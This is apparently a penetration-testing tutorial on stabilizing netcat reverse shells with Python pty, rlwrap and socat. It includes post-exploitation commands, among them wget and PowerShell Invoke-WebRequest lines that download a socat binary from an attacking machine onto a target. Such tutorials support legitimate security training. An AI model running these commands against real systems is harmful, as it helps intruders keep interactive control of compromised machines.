Stabilizing a shell (Getting a fully functional TTY)
As a pentester, we often deal with reverse or bind shells on the target system but the default nc (netcat) shells are very unstable. Pressing Ctrl + C will kill the whole thing. They are non-interactive and often have strange formatting errors. This is due to netcat “shells” really being processes running inside a terminal, rather than being bonafide terminals in their own right. Fortunately, there are many ways to stabilize netcat shells on Linux systems. We’ll be looking at three here. Stabilization of Windows reverse shells tends to be significantly harder; however, the second technique that we’ll be covering here is particularly useful for it.
Technique 1: Python
The first technique we’ll be discussing is applicable only to Linux targets, as they will nearly always have Python installed by default.
This is a three-stage process:
- The first step to do is use python -c ‘import pty;pty.spawn(“/bin/bash”)’, which uses Python to spawn a better-featured bash shell; note that some targets may need the version of Python specified. If this is the case, replace python with python2 or python3 as required. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.
- Step two is: export TERM=xterm — this will give us access to term commands such as clear.
- Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
The full technique can be seen in the below screenshot:
As shown in the above screenshot, after stabilization the shell became interactive and we can run the command ssh to connect with other systems from the target
Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
Technique 2: rlwrap
rlwrap is a program that, in simple terms, gives us access to history, tab auto-completion, and the arrow keys immediately upon receiving a shell; however, some manual stabilization must still be utilized if you want to be able to use Ctrl + C inside the shell. rlwrap is not installed by default on Kali, so first, install it with sudo apt install rlwrap.
To use rlwrap, we invoke a slightly different listener:
rlwrap nc -lvnp <port>
Prepending our netcat listener with “rlwrap” gives us a much more fully featured shell. This technique is particularly useful when dealing with Windows shells, which are otherwise notoriously difficult to stabilize. When dealing with a Linux target, it’s possible to completely stabilize, by using the same trick as in step three of the previous technique: background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilise and re-enter the shell.
Technique 3: Socat
The third easy way to stabilize a shell is quite simple to use an initial netcat shell as a stepping stone into a more fully-featured socat shell. Bear in mind that this technique is limited to Linux targets, as a Socat shell on Windows will be no more stable than a netcat shell.
To accomplish this method of stabilization we would first transfer a socat static compiled binary (a version of the program compiled to have no dependencies) up to the target machine. A typical way to achieve this would be using a webserver on the attacking machine inside the directory containing your socat binary (sudo python3 -m http.server 80), then, on the target machine, using the netcat shell to download the file. On Linux this would be accomplished with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat).
For the sake of completeness: in a Windows CLI environment the same can be done with Powershell, using either Invoke-WebRequest or a webrequest system class, depending on the version of Powershell installed (Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe).
Note:
With any of the above techniques, it’s useful to be able to change your terminal tty size. This is something that your terminal will do automatically when using a regular shell; however, it must be done manually in a reverse or bind shell if you want to use something like a text editor which overwrites everything on the screen.
First, open another terminal and run stty -a. This will give you a large stream of output. Note down the values for “rows” and “columns”:
Next, in your reverse/bind shell, type in:
stty rows <number>
and
stty cols <number>
Or
Stty rows <number> cols <number>
Filling in the numbers you got from running the command in your own terminal.
This will change the registered width and height of the terminal, thus allowing programs such as text editors which rely on such information being accurate to correctly open.
References:
